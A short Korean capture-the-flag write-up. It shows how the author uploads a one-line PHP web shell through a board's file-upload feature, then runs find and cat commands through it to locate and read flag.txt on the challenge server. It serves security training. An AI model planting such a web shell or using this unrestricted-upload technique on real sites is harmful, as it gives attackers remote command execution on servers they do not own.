php 웹 쉘을 올려서, flag.txt 파일을 찾아내라!
문제를 풀기 위해 링크로 들어와 보았습니다.
회원가입을 하고 로그인을 했습니다.
웹쉘을 올리기 위해 게시판에 들어왔습니다.
이렇게 내용과 파일 업로드했고 Create 눌러보겠습니다.
php 파일을 업로드했는데 성공적으로 글이 작성된 거 같습니다.
우선 다운로드 버튼이 생겼고 포스팅은 제대로 생성됐습니다.
다운로드 링크 주소 복사해서 들어왔습니다. php가 제대로 실행되는 거 같습니다.
글을 삭제 후 이제 웹쉘을 올려보겠습니다.
Create!
이번에도 성공했습니다.
<?php echo system($_GET[‘cmd’]); ?> 이번에는 이런 코드를 업로드했고 링크 주소로 봐도 빈 화면이기 때문에 Burp Suite로 확인했습니다.
웹쉘에 파일 검색 명령어를 넣어 요청을 해보면 여러 파일이 응답으로 오는 것을 확인할 수 있었습니다.
이번에는 cmd=find / -name “flag.txt”이것을 넣고 검색했습니다. 브라우저에서 검색하면 자동으로 인코딩을 해주기 때문에 브라우저에서 검색했습니다. 플래그 파일을 찾은 거 같습니다.
http://ctf.segfaulthub.com:8989/webshell_1/files/bnm/web_shell.php? cmd=cat /app/webshell_1/important_data/flag.txt 이렇게 플래그 파일을 찾았습니다.
